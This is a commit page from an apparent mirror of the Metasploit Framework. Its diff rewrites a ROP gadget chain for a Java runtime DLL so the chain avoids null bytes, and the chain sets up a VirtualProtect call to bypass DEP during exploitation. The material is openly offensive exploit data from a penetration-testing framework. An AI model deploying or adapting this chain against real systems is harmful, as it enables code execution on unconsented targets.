infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Java Rop null-byte free 

Our new heap spray routine does not like double nulls, so we need
to adjust our ROP.
bug/bundler_fix
sinn3r 2013-03-18 23:42:17 -05:00
parent afcbaffa2b
commit ea4c88bc2c
1 changed files with 21 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

36
data/ropdb/java.xml
View File

@ -6,22 +6,28 @@
</compatibility>
<gadgets base="0x7c340000">
<gadget offset="0x0000252c">POP EBP # RETN</gadget>
<gadget offset="0x0000252c">skip 4 bytes</gadget>
<gadget offset="0x0002c55a">POP EBX # RETN</gadget>
<gadget value="0x00000400">0x00000400-> ebx</gadget>
<gadget offset="0x00005249">POP EDX # RETN</gadget>
<gadget value="0x00000040">0x00000040-> edx</gadget>
<gadget offset="0x000011c0">POP ECX # RETN</gadget>
<gadget offset="0x00051897">Writable location</gadget>
<gadget offset="0x0000b8d7">POP EDI # RETN</gadget>
<gadget offset="0x00006c0b">RETN (ROP NOP)</gadget>
<gadget offset="0x00026fa6">POP ESI # RETN</gadget>
<gadget offset="0x00024c66">POP EBP # RETN</gadget>
<gadget offset="0x00024c66">skip 4 bytes</gadget>
<gadget offset="0x00004edc">POP EAX # RETN</gadget>
<gadget value="0xfffffdff">0x00000201</gadget>
<gadget offset="0x00011e05">NEG EAX # RETN</gadget>
<gadget offset="0x000136e3">POP EBX # RETN</gadget>
<gadget value="0xffffffff"></gadget>
<gadget offset="0x00005255">INC EBX # FPATAN # RETN</gadget>
<gadget offset="0x0001218e">ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN</gadget>
<gadget offset="0x00005937">POP EDX # RETN</gadget>
<gadget value="0xffffffc0">0x00000040</gadget>
<gadget offset="0x00011eb1">NEG EDX # RETN</gadget>
<gadget offset="0x0002c5b9">POP ECX # RETN</gadget>
<gadget offset="0x00051e67">Writable location</gadget>
<gadget offset="0x00002e58">POP EDI # RETN</gadget>
<gadget offset="0x0000d202">RETN (ROP NOP)</gadget>
<gadget offset="0x0000f8f4">POP ESI # RETN</gadget>
<gadget offset="0x000015a2">JMP [EAX]</gadget>
<gadget offset="0x000362fb">POP EAX # RETN</gadget>
<gadget offset="0x0003a151">ptr to VirtualProtect()</gadget>
<gadget offset="0x00038c81">PUSHAD # ADD AL,0EF # RETN</gadget>
<gadget offset="0x00005c30">ptr to 'push esp # ret</gadget>
<gadget offset="0x00004edc">POP EAX # RETN</gadget>
<gadget offset="0x0003a140">ptr to VirtualProtect()</gadget>
<gadget offset="0x00038c81">,PUSHAD # ADD AL,0EF # RETN</gadget>
<gadget offset="0x00005c30">ptr to 'push esp # ret</gadget>
</gadgets>
</rop>
</db>